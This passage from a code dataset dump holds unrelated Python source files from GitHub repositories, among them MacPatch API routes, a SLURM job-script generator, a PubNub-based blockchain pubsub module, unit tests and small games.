'''\n''' NOT A WEB SERVICE CLASS '''\n\ndef suServerListForID(list_id, os_ver):\n\n\t_serverObj = ServerInfo()\n\t_serverList = []\n\n\tosver = os_ver.split('.')\n\n\tq_catalog_list = MpAsusCatalogList.query.filter(MpAsusCatalogList.listid == list_id).first()\n\n\tif q_catalog_list is not None:\n\t\tq_cats = MpAsusCatalog.query.filter(MpAsusCatalog.os_major == int(osver[0]), MpAsusCatalog.os_minor == int(osver[1])).order_by(\n\t\t\tMpAsusCatalog.c_order.asc()).all()\n\n\t\t_serverObj.id = q_catalog_list.listid\n\t\t_serverObj.name = q_catalog_list.name\n\t\t_serverObj.version = q_catalog_list.version\n\telse:\n\t\t_serverObj.id = ''\n\t\t_serverObj.name = 'NA'\n\t\t_serverObj.version = '0'\n\n\t_catalog = {'os': osver[1], 'servers': []}\n\t_server_dict = {}\n\tif q_cats is not None:\n\t\tfor row in q_cats:\n\t\t\tif row.proxy == 1:\n\t\t\t\t_server_dict = {'CatalogURL': row.catalog_url, 'serverType': 1}\n\t\t\telse:\n\t\t\t\t_server_dict = {'CatalogURL': row.catalog_url, 'serverType': 0}\n\n\t\t\t_serverList.append(_server_dict)\n\t\t# Add the to the os version list dict\n\t\t_catalog['servers'] = _serverList\n\n\t# Add OS vesion servers array to main Dict\n\t_serverObj.servers = [_catalog]\n\n\treturn _serverObj\n\ndef serverListForID(list_id):\n\n\t_serverObj = ServerInfo()\n\t_serverList = []\n\n\tq_result = MpServerList.query.filter(MpServerList.name == \"Default\", MpServerList.listid == list_id).first()\n\n\tif q_result is not None:\n\t\tsetattr(_serverObj, \"name\", q_result.name)\n\t\tsetattr(_serverObj, \"version\", q_result.version)\n\t\tsetattr(_serverObj, \"id\", q_result.listid)\n\n\t\tq_servers_result = MpServer.query.filter(MpServer.active == 1, MpServer.listid == list_id).all()\n\t\tif q_servers_result is not None:\n\t\t\tfor row in q_servers_result:\n\t\t\t\t_srvObj = Server()\n\t\t\t\t_server_dict = _srvObj.importFromRowReturnDictionary(row.asDict)\n\t\t\t\t_serverList.append(_server_dict)\n\n\t\t\tsetattr(_serverObj, \"servers\", _serverList)\n\n\t\treturn _serverObj\n\n\telse:\n\t\treturn None\n\nclass ServerInfo(object):\n\tdef __init__(self):\n\t\tself.name = \"Default\"\n\t\tself.version = \"0\"\n\t\tself.id = \"NA\"\n\t\tself.servers = []\n\n\tdef struct(self):\n\t\treturn (self.__dict__)\n\n\tdef keys(self):\n\t\treturn list(self.__dict__.keys())\n\nclass Server(object):\n\tdef __init__(self):\n\t\tself.host = \"localhost\"\n\t\tself.port = \"2600\"\n\t\tself.useHTTPS = 1\n\t\tself.allowSelfSigned = 0\n\t\tself.useTLSAuth = 0\n\t\tself.serverType = 0\n\n\tdef struct(self):\n\t\treturn (self.__dict__)\n\n\tdef keys(self):\n\t\treturn list(self.__dict__.keys())\n\n\tdef importFromRowReturnDictionary(self, row):\n\t\t_my_keys = ['host', 'port', 'useHTTPS', 'allowSelfSigned', 'useTLSAuth']\n\t\t_keys = ['server', 'port', 'useSSL', 'allowSelfSignedCert', 'useSSLAuth']\n\n\t\tfor idx, key in enumerate(_my_keys):\n\t\t\tsetattr(self, key, row[_keys[idx]])\n\n\t\tif int(row['isMaster']) == 1:\n\t\t\tself.serverType = 0\n\t\telse:\n\t\t\tif int(row['isMaster']) == 0 and int(row['isProxy']) == 0:\n\t\t\t\tself.serverType = 1\n\t\t\telif int(row['isMaster']) == 0 and int(row['isProxy']) == 1:\n\t\t\t\tself.serverType = 2\n\n\t\treturn self.struct()\n\n# Add Routes Resources\n# Old\nservers_api.add_resource(SUSCatalogs, '/sus/catalogs/<string:osminor>/<string:cuuid>', endpoint='susUsingMinor')\nservers_api.add_resource(SUSCatalogs, '/sus/catalogs/<string:osmajor>/<string:osminor>/<string:cuuid>', endpoint='susUsingMajorMinor')\n# New\nservers_api.add_resource(SUSListVersion, 
'/sus/list/version/<string:cuuid>/<int:list_id>')\nservers_api.add_resource(SUServerList, '/sus/catalogs/list/<string:osminor>/<string:cuuid>', endpoint='asusUsingMinor')\nservers_api.add_resource(SUServerList, '/sus/catalogs/list/<string:osmajor>/<string:osminor>/<string:cuuid>', endpoint='asusUsingMajorMinor')\n\nservers_api.add_resource(ServerList, '/server/list/<string:cuuid>')\nservers_api.add_resource(ServerList, '/server/list/<int:list_id>/<string:cuuid>', endpoint='srvListWithID')\n\nservers_api.add_resource(ServerListVersion, '/server/list/version/<string:cuuid>', endpoint='srvListVerWithClientID')\nservers_api.add_resource(ServerListVersion, '/server/list/version/<int:list_id>/<string:cuuid>', endpoint='srvListVerWithID')\n","repo_name":"LLNL/MacPatch","sub_path":"Source/Server/apps/mpapi/servers/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"44"} +{"seq_id":"18894708904","text":"#!/usr/bin/python\n\nimport argparse\nimport getpass\nimport sys\nimport os.path\nfrom subprocess import call\n\n# Configure argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"-p\", \"--ntasks\", type=int, default=1, help=\"number of cores per node, default is 1\"\n)\nparser.add_argument(\n \"-n\", \"--nodes\", type=int, default=1, help=\"number of nodes, default is 1\"\n)\nparser.add_argument(\n \"-c\", \"--cpus\", type=int, default=1, help=\"number of cpus per task, default is 1\"\n)\nparser.add_argument(\n \"-t\",\n \"--time\",\n type=int,\n default=10,\n help=\"expected running time in seconds, default is 10\",\n)\nparser.add_argument(\n \"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"the *.out file, default is `execution_file_name`.out\",\n)\nparser.add_argument(\n \"-u\", \"--user\", type=str, default=\"\", help=\"user name, default is the current user\"\n)\nparser.add_argument(\n \"-i\",\n \"--input_file\",\n type=str,\n default=\"\",\n help=\"the input file like *.in, default is none\",\n)\nparser.add_argument(\n \"-s\", \"--output_sl\", type=str, default=\"\", help=\"the *.sl file to build\"\n)\nparser.add_argument(\n \"-g\", \"--gpus\", type=int, default=0, help=\"number of gpus, default is 0\"\n)\nparser.add_argument(\n \"--command\", type=str, default=\"srun\", help=\"run command, default is srun\"\n)\nparser.add_argument(\n \"--args\", type=str, default=\"\", help=\"other argument for the program\"\n)\nparser.add_argument(\"file\", type=str, help=\"the execution file\")\n\n# Parse and initialize arguments`\nargs = parser.parse_args()\nif args.output == \"\":\n args.output = args.file + \".out\"\nif args.user == \"\":\n args.user = getpass.getuser()\nif args.output_sl == \"\":\n args.output_sl = args.file + \".sl\"\nif args.command == \"srun\" or args.command == \"mpirun\":\n args.command += \" -n $SLURM_NTASKS\"\n\n# Exit if the file provided does not exist\nif not os.path.exists(args.file):\n sys.exit(\"{} does not exist!\".format(args.file))\nif args.input_file != \"\" and not os.path.exists(args.input_file):\n sys.exit(\"{} does not exist!\".format(args.input_file))\n\n# Build *.sl file\nwith open(args.output_sl, \"w\") as f:\n f.write(\"#!/bin/bash\\n\")\n f.write(\"#SBATCH --ntasks-per-node={}\\n\".format(args.ntasks))\n f.write(\"#SBATCH --nodes={}\\n\".format(args.nodes))\n f.write(\"#SBATCH --cpus-per-task={}\\n\".format(args.cpus))\n if args.gpus != 0:\n f.write(\"#SBATCH --gres=gpu:{}\\n\".format(args.gpus))\n 
f.write(\n \"#SBATCH --time={}:{}:{}\\n\".format(\n str(args.time // 3600).zfill(2),\n str(args.time // 60 % 60).zfill(2),\n str(args.time % 60).zfill(2),\n )\n )\n f.write(\"#SBATCH --output={}\\n\".format(args.output))\n f.write(\"#SBATCH -A lc_an2\\n\")\n f.write(\"WORK_HOME=/home/rcf-proj/an2/{}\\n\".format(args.user))\n # f.write(\"cd $WORK_HOME\\n\")\n srun_command = \"{} {} {}\".format(args.command, args.file, args.args)\n if args.input_file != \"\":\n srun_command += \" < {}\".format(args.input_file)\n f.write(srun_command)\n\n# Submit the job\ncall([\"sbatch\", args.output_sl])\n","repo_name":"dalegebit/sgo","sub_path":"sgo.py","file_name":"sgo.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69803224455","text":"from django.db.models import Q\n\nfrom sellmo import modules\nfrom sellmo.core.local import get_context\nfrom sellmo.api.decorators import link\nfrom sellmo.api.pricing import Price\n\n\nnamespace = modules.pricing.namespace\n\n\n@link()\ndef retrieve(stampable, prop, price=None, **kwargs):\n field = '{0}_discount_discount'.format(prop)\n discount_id = getattr(stampable, '{0}_id'.format(field), None)\n if discount_id is not None:\n context = get_context()\n discounts = context.get('discounts', {})\n if not discount_id in discounts:\n # Query now\n discounts[discount_id] = getattr(stampable, field)\n context['discounts'] = discounts\n price.context['discount'] = discounts[discount_id]\n return {\n 'price': price\n }\n\n\n@link()\ndef stamp(stampable, prop, price, **kwargs):\n if 'discount' in price.context:\n field = '{0}_discount_discount'.format(prop)\n setattr(stampable, field, price.context['discount'])\n\n\n@link(namespace=modules.product.namespace, capture=True)\ndef list(request, discount_group=None, **kwargs):\n if discount_group is None:\n customer = modules.customer.get_customer(request=request)\n if customer and customer.is_authenticated():\n discount_group = customer.discount_group\n return {\n 'discount_group' : discount_group,\n }\n \n\n@link(namespace=modules.store.namespace)\ndef make_purchase(request, purchase, **kwargs):\n if modules.discount.user_discount_enabled:\n customer = modules.customer.get_customer(request=request)\n if customer and customer.is_authenticated():\n purchase.discount_group = customer.discount_group\n purchase.calculate(save=False)\n return {\n 'purchase': purchase\n }\n\n\n@link()\ndef get_price(price, product=None, discount_group=None, raw=False, **kwargs):\n if raw:\n return\n \n discount = None\n if product:\n try:\n discount = modules.discount.Discount.objects.polymorphic()\n if modules.discount.user_discount_enabled:\n q = Q(groups=None)\n if discount_group:\n q |= Q(groups=discount_group)\n discount = discount.filter(q)\n discount = discount.get_best_for_product(product)\n except modules.discount.Discount.DoesNotExist:\n discount = None\n\n if discount:\n price = discount.apply(price)\n\n return {\n 'price': price\n }\n","repo_name":"leotop/django-sellmo","sub_path":"sellmo/contrib/discount/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19931970301","text":"from sys import stdin, setrecursionlimit as srl\nfrom threading import stack_size, Thread\n\nsrl(int(1e9)+7)\nstack_size(int(1e8))\nip=stdin.readline\n\ndef main():\n\tn, m=map(int, input('Enter No. 
of nodes and edges: ').split())\n\tprint('Enter edges for Directed Acyclic Graph')\n\tadj=[[] for _ in range(n+1)]\n\twhile m:\n\t\tm-=1\n\t\tx,y=map(int, ip().split())\n\t\tadj[x].append(y)\n\t\n\tvisited=[0]*(n+1)\n\tstk=[]\n\tfor x in range(1, n+1):\n\t\tdef topsort(v):\n\t\t\tif visited[v]: return\n\t\t\tvisited[v]=1\n\t\t\tfor i in adj[v]:\n\t\t\t\ttopsort(i)\n\t\t\tstk.append(v)\n\t\tif not visited[x]: topsort(x)\n\t\t\n\tprint(*stk[::-1])\n\t\nThread(target=main).start()\n","repo_name":"Aatmsaat/competitive-programming-base","sub_path":"Topological sort.py","file_name":"Topological sort.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18529864373","text":"import boto3\n\nfrom chalicelib.cob.exceptions import CalendarException\nfrom chalicelib.env import get_env_vars\n\n\nclass T24Calendar:\n # Note: singleton is not enforced\n _instance = None\n\n @classmethod\n def get_instance(cls):\n if cls._instance is None:\n cls._instance = T24Calendar()\n return cls._instance\n\n def __init__(self) -> None:\n dynamodb_client = boto3.resource(\"dynamodb\")\n self._table = dynamodb_client.Table(get_env_vars().f_holiday_table)\n self._fetched_years = {}\n\n def get_previous_cob_date(self, cob_date: str):\n self._prepare_workday(cob_date)\n\n if cob_date not in self._prev_date:\n raise CalendarException(f\"{cob_date} is not a working day\")\n\n return self._prev_date[cob_date]\n\n def _prepare_workday(self, cob_date: str):\n year = int(cob_date[:4])\n if year not in self._fetched_years:\n self._fetch_year(year)\n self._fetch_year(year - 1)\n # re-populate prev dates\n self._prev_date = {}\n self._workday_dates = []\n for _, v in sorted(self._fetched_years.items()):\n self._workday_dates += v\n for i in range(len(self._workday_dates) - 1):\n self._prev_date[self._workday_dates[i + 1]] = self._workday_dates[i]\n\n def _fetch_year(self, year: int):\n if year not in self._fetched_years:\n self._fetched_years[year] = self._table.get_item(Key={\"Source\": \"f_holiday\", \"Key\": str(year)}).get(\n \"Item\", {\"workdays\": []}\n )[\"workdays\"]","repo_name":"ducpham4010/aws-reference-code","sub_path":"tcb-etl-framework/orchestration-cloud/chalicelib/cob/models/t24_calendar.py","file_name":"t24_calendar.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"764832594","text":"\"\"\"\nOnce a block is added to the blockchain, that block should be shared with\nall the other miners in the network; so that they can the new block to their\nlocal blockchain instance\n\"\"\"\n\nimport time\n\nfrom pubnub.pubnub import PubNub\nfrom pubnub.pnconfiguration import PNConfiguration\nfrom pubnub.callbacks import SubscribeCallback\n\nfrom server.blockchain.block import Block\nfrom server.wallet.transaction import Transaction\n\npnconfig = PNConfiguration()\npnconfig.subscribe_key = 'sub-c-a62ebcde-ed5a-11eb-b0cf-7e76ce3f98e8'\npnconfig.publish_key = 'pub-c-1cb48536-63ff-457a-b690-e21d4989dc31'\n\n\"\"\"\nTo execute the pubsub, we need:\n 1. publisher\n 2. subscriber\n 3. 
channel\n\"\"\"\n\nCHANNELS = {\n 'TEST': 'TEST',\n 'BLOCK': 'BLOCK',\n 'TRANSACTION': 'TRANSACTION'\n}\n\nclass Listener(SubscribeCallback):\n \"\"\"\n To handle the subscriber once it receives the message\n \"\"\"\n def __init__(self, blockchain, transaction_pool):\n self.blockchain = blockchain\n self.transaction_pool = transaction_pool\n\n #newly added block is inside the message\n #need to validate it once the node recives the message\n def message(self, pubnub, message_object):\n print(f'\\n-- Channel: {message_object.channel} | Message: {message_object.message}\\n')\n\n if message_object.channel == CHANNELS['BLOCK']:\n block = Block.from_json(message_object.message)\n potential_chain = self.blockchain.chain[:]\n potential_chain.append(block)\n\n try:\n self.blockchain.replace_chain(potential_chain)\n self.transaction_pool.clear_blockchain_transactions(\n self.blockchain\n )\n print('\\n --Successfully replaced chain')\n except Exception as e:\n print(f'\\n -- Did not replace chain: {e}')\n\n elif message_object.channel == CHANNELS['TRANSACTION']:\n transaction = Transaction.from_json(message_object.message)\n self.transaction_pool.set_transaction(transaction)\n print('\\n -- Set the new transaction in the transaction pool')\n\nclass PubSub():\n \"\"\"\n Handles the publish/subscribe layer of the application.\n Provides communication between the nodes of the blockchain network\n \"\"\"\n def __init__(self, blockchain, transaction_pool):\n self.pubnub = PubNub(pnconfig)\n self.pubnub.subscribe().channels(CHANNELS.values()).execute()\n self.pubnub.add_listener(Listener(blockchain, transaction_pool))\n\n def publish(self, channel, message):\n \"\"\"\n Publish the message object to the channel.\n \"\"\"\n self.pubnub.publish().channel(channel).message(message).sync()\n\n def broadcast_block(self, block):\n \"\"\"\n Broadcast a block object to all nodes.\n \"\"\"\n self.publish(CHANNELS['BLOCK'], block.to_json())\n\n def broadcast_transaction(self, transaction):\n \"\"\"\n Broadcast a transaction to all nodes.\n \"\"\"\n self.publish(CHANNELS['TRANSACTION'], transaction.to_json())\n\ndef main():\n pubsub = PubSub()\n time.sleep(1)\n pubsub.publish(CHANNELS['TEST'], {'foo': 'bar'})\n\nif __name__ =='__main__':\n main()\n","repo_name":"nicholaas2cheung/cryptocurrency-starter","sub_path":"server/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73920995972","text":"import os\nimport sys\nfrom collections import Counter\nfrom itertools import chain\n\n\nif __name__ == '__main__':\n with open(os.path.join(sys.path[0], \"input.txt\")) as f:\n input_list = f.read().splitlines()\n input_list = [list(x) for x in input_list]\n print(input_list)\n\n container = [input_list]\n while True:\n curr_list = container[-1]\n out = []\n for i, row in enumerate(curr_list):\n out_r = []\n for j, seat in enumerate(row):\n if seat != \".\":\n left = \"-\" if j == 0 else curr_list[i][j-1]\n right = \"-\" if j == len(row) - 1 else curr_list[i][j+1]\n up = \"-\" if i == 0 else curr_list[i - 1][j]\n down = \"-\" if i == len(curr_list) - 1 else curr_list[i+1][j]\n up_left = \"-\" if i == 0 or j == 0 else curr_list[i-1][j-1]\n up_right = \"-\" if i == 0 or j == len(row) - 1 else curr_list[i-1][j+1]\n down_left = \"-\" if i == len(curr_list) - 1 or j == 0 else curr_list[i+1][j-1]\n down_right = \"-\" if i == len(curr_list) - 1 or j == len(row) - 1 else curr_list[i+1][j+1]\n 
seats_around = Counter(\n [left, right, up, down, up_left, up_right, down_left,\n down_right]\n )\n if seat == \"L\" and seats_around[\"#\"] == 0:\n out_r.append('#')\n elif seat == \"#\" and seats_around[\"#\"] >= 4:\n out_r.append('L')\n else:\n out_r.append(seat)\n else:\n out_r.append(seat)\n\n out.append(out_r)\n container.append(out)\n if len(container) >= 2:\n if container[-1] == container[-2]:\n break\n print(container[-1])\n final_seating = chain.from_iterable(container[-1])\n f_s = Counter(''.join(f) for f in final_seating)\n res = f_s[\"#\"]\n print(res)\n","repo_name":"drealfemo/aoc_2020","sub_path":"day_11/day_eleven.py","file_name":"day_eleven.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10163297081","text":"import os\n\nimport pytest\n\nfrom unstructured.documents.elements import NarrativeText, Title\nfrom unstructured.staging import label_box\n\n\n@pytest.fixture()\ndef elements():\n return [Title(text=\"Title 1\"), NarrativeText(text=\"Narrative 1\")]\n\n\n@pytest.fixture()\ndef output_directory(tmp_path):\n return str(tmp_path)\n\n\n@pytest.fixture()\ndef nonexistent_output_directory(tmp_path):\n return os.path.join(str(tmp_path), \"nonexistent_dir\")\n\n\n@pytest.fixture()\ndef url_prefix():\n return \"https://storage.googleapis.com/labelbox-sample-datasets/nlp\"\n\n\n@pytest.mark.parametrize(\n (\"attachments\", \"raises_error\"),\n [\n (\n [\n {\"type\": \"RAW_TEXT\", \"value\": \"Description Text\"},\n {\"type\": \"IMAGE\", \"value\": \"Image label\", \"ignored_value\": 123},\n ],\n False,\n ),\n ([{\"type\": \"INVALID_TYPE\", \"value\": \"Description Text\"}], True),\n ([{\"type\": \"RAW_TEXT\", \"value\": 1}], True),\n ([{\"type\": \"RAW_TEXT\"}], True),\n ([{\"value\": \"My text label\"}], True),\n ],\n)\ndef test_validate_attachments(attachments, raises_error):\n if raises_error:\n with pytest.raises(ValueError):\n label_box._validate_attachments(attachments, 0)\n else:\n label_box._validate_attachments(attachments, 0)\n\n\nattachment = {\"type\": \"RAW_TEXT\", \"value\": \"Text description.\"}\n\n\n@pytest.mark.parametrize(\n (\n (\n \"external_ids\",\n \"attachments\",\n \"output_directory_fixture\",\n \"create_directory\",\n \"raises\",\n \"exception_class\",\n )\n ),\n [\n (None, None, \"output_directory\", True, False, None),\n ([\"id1\", \"id2\"], None, \"output_directory\", True, False, None),\n ([\"id1\"], None, \"output_directory\", True, True, ValueError),\n (None, [[attachment], [attachment]], \"output_directory\", True, False, None),\n (None, [[attachment]], \"output_directory\", True, True, ValueError),\n ([\"id1\", \"id2\"], [[attachment] * 2, [attachment]], \"output_directory\", True, False, None),\n (\n [\"id1\", \"id2\"],\n [[attachment] * 2, [attachment]],\n \"nonexistent_output_directory\",\n True,\n False,\n None,\n ),\n (\n [\"id1\", \"id2\"],\n [[attachment] * 2, [attachment]],\n \"nonexistent_output_directory\",\n False,\n True,\n FileNotFoundError,\n ),\n ],\n)\ndef test_stage_for_label_box(\n elements,\n url_prefix,\n external_ids,\n attachments,\n output_directory_fixture,\n create_directory,\n raises,\n exception_class,\n request,\n):\n output_directory = request.getfixturevalue(output_directory_fixture)\n if raises:\n with pytest.raises(exception_class):\n label_box.stage_for_label_box(\n elements,\n output_directory,\n url_prefix,\n external_ids=external_ids,\n attachments=attachments,\n create_directory=create_directory,\n 
)\n else:\n config = label_box.stage_for_label_box(\n elements,\n output_directory,\n url_prefix,\n external_ids=external_ids,\n attachments=attachments,\n create_directory=create_directory,\n )\n assert len(config) == len(elements)\n for index, (element_config, element) in enumerate(zip(config, elements)):\n print(element_config)\n\n if external_ids:\n assert element_config[\"externalId\"] == external_ids[index]\n else:\n assert element_config[\"externalId\"] == element.id\n\n if attachments:\n assert element_config[\"attachments\"] == [\n {\"type\": attachment[\"type\"], \"value\": attachment[\"value\"]}\n for attachment in attachments[index]\n ]\n\n assert element_config[\"data\"].startswith(url_prefix)\n assert element_config[\"data\"].endswith(f'{element_config[\"externalId\"]}.txt')\n\n output_filepath = os.path.join(output_directory, f'{element_config[\"externalId\"]}.txt')\n with open(output_filepath) as data_file:\n assert data_file.read().strip() == element.text.strip()\n","repo_name":"Unstructured-IO/unstructured","sub_path":"test_unstructured/staging/test_label_box.py","file_name":"test_label_box.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":3375,"dataset":"github-code","pt":"44"} +{"seq_id":"11692707516","text":"from Game import Game\nfrom Renderable import Renderable\nfrom Player import Player\nfrom pygame import *\nimport random\n\nclass LightBike(Player):\n def __init__(self, *args, **kwargs):\n Player.__init__(self, *args, **kwargs)\n self.cells = []\n self.dir = 1\n self.x = 40\n self.y = 30\n self.dead = False\n\n def update(self, delta, otherCells = []):\n if not self.dead:\n if self.dir == 0:\n self.y -= 1\n elif self.dir == 1:\n self.x += 1\n elif self.dir == 2:\n self.y += 1\n elif self.dir == 3:\n self.x -= 1\n if self.x < 0 or self.y < 0 or self.x >= 80 or self.y >= 60:\n self.dead = True\n if [self.x,self.y] in self.cells or [self.x,self.y] in otherCells:\n self.dead = True\n self.cells.append([self.x,self.y])\n self.addUniqueRenderable(self.x*10,self.y*10,\"blue.png\")\n\n def handleInput(self, type, input):\n if type == KEYDOWN:\n if input == K_UP:\n self.dir = 0\n if input == K_DOWN:\n self.dir = 2\n if input == K_RIGHT:\n self.dir = 1\n if input == K_LEFT:\n self.dir = 3\n\nclass TronGame(Game):\n channelClass = LightBike\n def __init__(self, *args, **kwargs):\n Game.__init__(self, *args, **kwargs)\n self.updatet = 0\n self.speed = 40\n\n def update(self, delta):\n self.updatet += delta\n\n if self.updatet>self.speed:\n self.updatet = 0\n for p in self.players:\n if p.ready:\n p.update(delta)","repo_name":"Paradxil/Tron_Multiplayer","sub_path":"TronGame.py","file_name":"TronGame.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71836436612","text":"from __future__ import print_function\n\nimport json\nimport string\nimport sys\n\ndef gen_tests(data, prefix):\n \"\"\"Creates the HTML for all test cases.\n\n Args:\n data: Parsed JSON data that was created by gen_json.py.\n prefix: Considers Jenkins jobs that start with this.\n\n Returns:\n The HTML as a list of elements along with the number of passing,\n unstable, failing, and skipped tests.\n \"\"\"\n html = ['<ul class=\"test\">']\n total_okay = 0\n total_unstable = 0\n total_failed = 0\n total_skipped = 0\n for test in sorted(data, key=string.lower):\n test_html = ['<ul class=\"suite\">']\n has_test = False\n has_failed = False\n has_unstable = 
False\n for suite in sorted(data[test]):\n if not suite.startswith(prefix):\n continue\n has_test = True\n num_failed = 0\n num_builds = 0\n total_time = 0\n for build in data[test][suite]:\n num_builds += 1\n if build['failed']:\n num_failed += 1\n total_time += build['time']\n avg_time = total_time / num_builds\n unit = 's'\n if avg_time > 60:\n avg_time /= 60\n unit = 'm'\n if num_failed == num_builds:\n has_failed = True\n status = 'failed'\n elif num_failed > 0:\n has_unstable = True\n status = 'unstable'\n else:\n status = 'okay'\n test_html.append('<li class=\"suite\">')\n test_html.append('<span class=\"{}\">{}/{}</span>'.format(status, str(num_builds - num_failed), str(num_builds)))\n test_html.append('<span class=\"time\">{}</span>'.format(str(int(avg_time)) + unit))\n test_html.append(suite)\n test_html.append('</li>')\n if has_failed:\n status = 'failed'\n total_failed += 1\n elif has_unstable:\n status = 'unstable'\n total_unstable += 1\n elif has_test:\n status = 'okay'\n total_okay += 1\n else:\n status = 'skipped'\n total_skipped += 1\n html.append('<li class=\"test {}\">{}'.format(status, test))\n html.extend(test_html)\n html.append('</ul>')\n html.append('</li>')\n html.append('</ul>')\n return html, total_okay, total_unstable, total_failed, total_skipped\n\ndef gen_html(data, prefix):\n \"\"\"Creates the HTML for the entire page.\n\n Args: Same as gen_tests.\n Returns: Just the list of HTML elements.\n \"\"\"\n tests_html, okay, unstable, failed, skipped = gen_tests(data, prefix)\n html = ['<html>', '<head>']\n html.append('<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" />')\n html.append('<script src=\"script.js\"></script>')\n html.append('</head>')\n html.append('<body>')\n if len(prefix) > 0:\n html.append('<div id=\"header\">Suites starting with {}:'.format(prefix))\n else:\n html.append('<div id=\"header\">All suites:')\n html.append('<span class=\"total okay\" onclick=\"toggle(\\'okay\\');\">{}</span>'.format(str(okay)))\n html.append('<span class=\"total unstable\" onclick=\"toggle(\\'unstable\\');\">{}</span>'.format(str(unstable)))\n html.append('<span class=\"total failed\" onclick=\"toggle(\\'failed\\');\">{}</span>'.format(str(failed)))\n html.append('<span class=\"total skipped\" onclick=\"toggle(\\'skipped\\');\">{}</span>'.format(str(skipped)))\n html.append('</div>')\n html.extend(tests_html)\n html.append('</body>')\n html.append('</html>')\n return html\n\nif __name__ == '__main__':\n prefix = ''\n if len(sys.argv) == 2:\n prefix = sys.argv[1]\n with open('tests.json', 'r') as f:\n print('\\n'.join(gen_html(json.load(f), prefix)))\n","repo_name":"fabric8io/kansible","sub_path":"vendor/k8s.io/kubernetes/hack/jenkins/test-history/gen_html.py","file_name":"gen_html.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"44"} +{"seq_id":"4183198605","text":"import csv\nimport argparse\nimport re\n\n\n# 20220707-box/1093688960/1093688960.wpi\nPATTERN = re.compile(r\".+/(?P<plate_name>.+)/(?P<image_file>.+)\\.(wpi|ome\\.xml|companion\\.ome)\")\n\nparser = argparse.ArgumentParser(description=\"Build filepaths.tsv\")\nparser.add_argument(\"file\", help=\"Annotations file\")\nparser.add_argument(\"filelist\", help=\"List of image files\")\nargs = parser.parse_args()\n\nplates = []\nplate_file_map = {}\n\n# Compile a list of plate names\nwith open(args.file, mode='r', encoding='utf-8-sig') as input_file:\n csv_reader = csv.DictReader(input_file)\n for row in 
csv_reader:\n if not row[\"Plate\"] in plates:\n plates.append(row[\"Plate\"])\n\n# Check the list of images files to find the corresponding \"main\" file to import\nwith open(args.filelist, mode='r') as input_file:\n for line in input_file.readlines():\n m = PATTERN.match(line.strip())\n if m:\n plate_file_map[m.group(\"plate_name\")] = f\"/uod/idr/filesets/idr0139-lawson-fascin/{line.strip()}\"\n\n# Print the tsv to std out\nfor plate in plates:\n print(f\"{plate_file_map.get(plate, 'NA')}\\t{plate}\")\n","repo_name":"IDR/idr0139-lawson-fascin","sub_path":"scripts/filepaths.py","file_name":"filepaths.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41750210600","text":"from pico2d import *\nimport game_framework\nimport collision\nimport server\nimport game_world\n\nPIXEL_PER_METER = (30.0 / 0.6) # 30 pixel 60cm\nRUN_SPEED_KMPH = 15.0\nRUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0 / 60.0)\nRUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\nRUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\nTIME_PER_ACTION = 0.8\nACTION_PER_TIME = 1.0 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 8\n\n# Boy Event\nTOP_DOWN, BOTTOM_DOWN, RIGHT_DOWN, LEFT_DOWN, TOP_UP, BOTTOM_UP, RIGHT_UP, LEFT_UP, Z_DOWN, Z_UP= range(10)\n\nkey_event_table = {\n (SDL_KEYDOWN, SDLK_UP): TOP_DOWN,\n (SDL_KEYDOWN, SDLK_DOWN): BOTTOM_DOWN,\n (SDL_KEYDOWN, SDLK_RIGHT): RIGHT_DOWN,\n (SDL_KEYDOWN, SDLK_LEFT): LEFT_DOWN,\n (SDL_KEYDOWN, SDLK_z): Z_DOWN,\n\n (SDL_KEYUP, SDLK_UP): TOP_UP,\n (SDL_KEYUP, SDLK_DOWN): BOTTOM_UP,\n (SDL_KEYUP, SDLK_RIGHT): RIGHT_UP,\n (SDL_KEYUP, SDLK_LEFT): LEFT_UP,\n (SDL_KEYUP, SDLK_z): Z_UP\n}\n\n# class IdleState: # 가만히 서 있을때\n# def enter(boy, event):\n# if event == RIGHT_DOWN:\n# boy.velocity_x += RUN_SPEED_PPS\n# boy.height = 4\n# elif event == LEFT_DOWN:\n# boy.velocity_x -= RUN_SPEED_PPS\n# boy.height = 5\n# elif event == TOP_DOWN:\n# boy.velocity_y += RUN_SPEED_PPS\n# boy.height = 7\n# elif event == BOTTOM_DOWN:\n# boy.velocity_y -= RUN_SPEED_PPS\n# boy.height = 6\n# elif event == RIGHT_UP:\n# boy.velocity_x -= RUN_SPEED_PPS\n# boy.height = 4\n# elif event == LEFT_UP:\n# boy.velocity_x += RUN_SPEED_PPS\n# boy.height = 5\n# elif event == TOP_UP:\n# boy.velocity_y -= 